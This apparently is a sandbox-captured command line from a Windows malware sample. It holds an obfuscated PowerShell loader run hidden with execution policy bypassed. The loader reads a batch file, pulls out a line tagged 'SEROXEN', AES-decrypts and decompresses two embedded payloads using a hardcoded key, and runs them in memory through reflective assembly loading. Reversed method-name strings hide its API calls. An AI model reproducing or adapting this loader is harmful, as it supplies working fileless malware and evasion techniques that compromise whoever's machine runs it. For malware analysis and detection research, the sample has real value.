novmUni.bat.exe "novmUni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function ItmBZ($ogric){ $IElVr=[System.Security.Cryptography.Aes]::Create(); $IElVr.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IElVr.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IElVr.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wJjorT+Aac5NCh5wrAWQUFcEPUj7wBVKQNjCfdJ0KRw='); $IElVr.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Krv5KmIo7w4pmwbM//SeQw=='); $JySGi=$IElVr.CreateDecryptor(); $return_var=$JySGi.TransformFinalBlock($ogric, 0, $ogric.Length); $JySGi.Dispose(); $IElVr.Dispose(); $return_var;}function eaEXK($ogric){ $OPfxB=New-Object System.IO.MemoryStream(,$ogric); $YVwfV=New-Object System.IO.MemoryStream; $oEEGY=New-Object System.IO.Compression.GZipStream($OPfxB, [IO.Compression.CompressionMode]::Decompress); $oEEGY.CopyTo($YVwfV); $oEEGY.Dispose(); $OPfxB.Dispose(); $YVwfV.Dispose(); $YVwfV.ToArray();}function wJchA($ogric,$cRbox){ $GnPPz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$ogric); $HeFrj=$GnPPz.EntryPoint; $HeFrj.Invoke($null, $cRbox);}$TsnzL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\test22\AppData\Local\Temp\IXP000.TMP\novmUni.bat').Split([Environment]::NewLine);foreach ($fSaiO in $TsnzL) { if ($fSaiO.StartsWith('SEROXEN')) { $BJIxm=$fSaiO.Substring(7); break; }}$KjNon=[string[]]$BJIxm.Split('\');$SEncS=eaEXK (ItmBZ ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($KjNon[0])));$wCpiI=eaEXK (ItmBZ ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($KjNon[1])));wJchA $wCpiI (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));wJchA $SEncS (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
2736